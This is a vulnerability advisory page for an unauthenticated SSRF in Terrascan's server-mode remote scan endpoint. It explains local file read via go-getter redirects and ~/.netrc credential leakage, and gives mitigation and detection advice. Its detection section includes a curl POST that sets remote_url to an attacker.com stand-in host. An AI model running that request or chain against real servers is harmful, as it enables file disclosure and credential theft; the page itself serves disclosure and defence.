CVE-2026-47357
Analyzed Analyzed - Analysis Complete
Server-Side Request Forgery in Terrascan

Publication date: 2026-05-19

Last updated on: 2026-05-20

Assigner: Tenable Network Security, Inc.

Description
Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via the remote_url parameter in the remote directory scan endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/remote/dir/scan) when running in server mode. An unauthenticated remote attacker can supply an attacker-controlled HTTP URL as remote_url with remote_type set to "http". The URL is passed directly to hashicorp/go-getter (v1.7.5) without validation. Go-getter's HttpGetter supports the X-Terraform-Get response header, allowing the attacker's server to redirect the download to a file:// URL, enabling local file read. Additionally, HttpGetter has Netrc set to true, causing it to read ~/.netrc and send stored credentials to attacker-controlled hostnames. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-05-19
Last Modified
2026-05-20
Generated
2026-06-10
AI Q&A
2026-05-19
EPSS Evaluated
2026-06-08
NVD
CVE-2026-47357
EUVD
EUVD-2026-30957
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
tenable terrascan to 1.18.3 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-73 The product allows user input to control or influence paths or file names that are used in filesystem operations.
CWE-610 The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

Terrascan versions 1.18.3 and earlier have a Server-Side Request Forgery (SSRF) vulnerability in the remote directory scan endpoint when running in server mode. An unauthenticated attacker can supply a malicious HTTP URL via the remote_url parameter, which is passed without validation to the hashicorp/go-getter library. This library supports a response header that allows redirection to local file URLs, enabling the attacker to read local files. Additionally, the library reads credentials from the user's ~/.netrc file and sends them to attacker-controlled hosts. This vulnerability affects Terrascan servers bound to all network interfaces without authentication.

Compliance Impact

The provided context does not explicitly describe how the CVE-2026-47357 vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.

Mitigation Strategies

Terrascan versions v1.18.3 and prior are vulnerable and no patch will be released since the project was archived in August 2023.

To mitigate this vulnerability, you should stop running Terrascan in server mode, especially if it is bound to 0.0.0.0 with no authentication.

Consider removing or restricting access to the vulnerable endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/remote/dir/scan) that accepts the remote_url parameter.

Implement network-level controls such as firewall rules to block untrusted external access to the Terrascan server.

Since no patch is available, migrating to alternative tools or scanning methods that do not expose this vulnerability is recommended.

Impact Analysis

This vulnerability can allow an attacker to read local files on the server running Terrascan, potentially exposing sensitive information. Furthermore, the attacker can obtain credentials stored in the ~/.netrc file and send them to malicious hosts, leading to credential theft. Since the server runs without authentication and listens on all interfaces, it is exposed to remote exploitation.

Detection Guidance

This vulnerability affects Terrascan running in server mode (terrascan server) versions v1.18.3 and prior, which bind to 0.0.0.0 with no authentication and accept POST requests to the remote directory scan endpoint.

To detect if your system is vulnerable, you can check if Terrascan server is running and listening on network interfaces without authentication.

You can use network scanning commands to identify if the Terrascan server is exposed:

  • Use netstat or ss to check for Terrascan server listening ports (default or configured):
  • netstat -tulnp | grep terrascan
  • ss -tulnp | grep terrascan

You can also attempt to send a crafted POST request to the vulnerable endpoint to test if the server responds without authentication:

  • curl -X POST http://<terrascan-server-ip>:<port>/v1/<iac>/<iacVersion>/<cloud>/remote/dir/scan -d '{"remote_url":"http://attacker.com/malicious","remote_type":"http"}' -H 'Content-Type: application/json' -v

If the server responds and processes the request, it indicates the vulnerability is present.

Note: Since Terrascan was archived and no patch will be released, consider disabling or isolating the server mode to mitigate risk.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-47357. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart